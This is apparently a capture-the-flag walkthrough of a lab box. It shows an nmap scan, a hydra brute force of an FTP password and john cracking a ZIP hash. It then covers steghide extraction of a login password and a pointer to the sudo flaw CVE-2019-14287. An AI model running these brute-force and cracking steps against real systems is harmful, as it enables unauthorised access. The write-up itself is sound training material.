# Nmap 7.91 scan initiated Fri Mar 19 15:05:55 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.48.220 Nmap scan report for 10.10.48.220 Host is up (0.081s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA) | 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA) |_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Annoucement Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 19 15:09:12 2021 -- 1 IP address (1 host up) scanned in 197.36 seconds
We know a user is named chris so let's try to BF its password over FTP.
1 2 3 4 5 6 7 8 9 10 11
$ hydra -l chris -P /usr/share/wordlists/passwords/rockyou.txt 10.10.48.220 ftp -I Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-19 16:56:03 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ftp://10.10.48.220:21/
[21][ftp] host: 10.10.48.220 login: chris password: crystal 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-19 16:56:55
We can connect to the ftp server see a file To_agentJ.txt:
1 2 3 4 5 6
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt Warning: detected hash type "ZIP", but the string is also recognized as "ZIP-opencl" Use the "--format=ZIP-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status alien (8702.zip/To_agentR.txt) 1g 0:00:00:00 DONE (2021-03-19 17:52) 2.173g/s 53426p/s 53426c/s 53426C/s chatty..280690 Use the "--show" option to display all of the cracked passwords reliably Session completed
$ 7z x _cutie.png.extracted/8702.zip
There is only one file: To_agentR.txt.
1 2 3 4 5 6
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By, Agent R
It's a base64 string:
1 2
$ printf %s 'QXJlYTUx' | base64 -d Area51
It's maybe a password. For this step I read another write-up since it's a
false-stage guess step. You have to use the password with steghide on the
other image.
$ steghide info cute-alien.jpg "cute-alien.jpg": format: jpeg capacity: 1,8 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "message.txt": size: 181,0 Byte encrypted: rijndael-128, cbc compressed: yes
$ steghide extract -sf cute-alien.jpg Enter passphrase: wrote extracted data to "message.txt"
$ cat message.txt Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
james@agent-sudo:~$ sudo -l [sudo] password for james: Matching Defaults entries for james on agent-sudo: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo: (ALL, !root) /bin/bash
Looks like CVE-2019-14287, we can spawn command as anyone but root.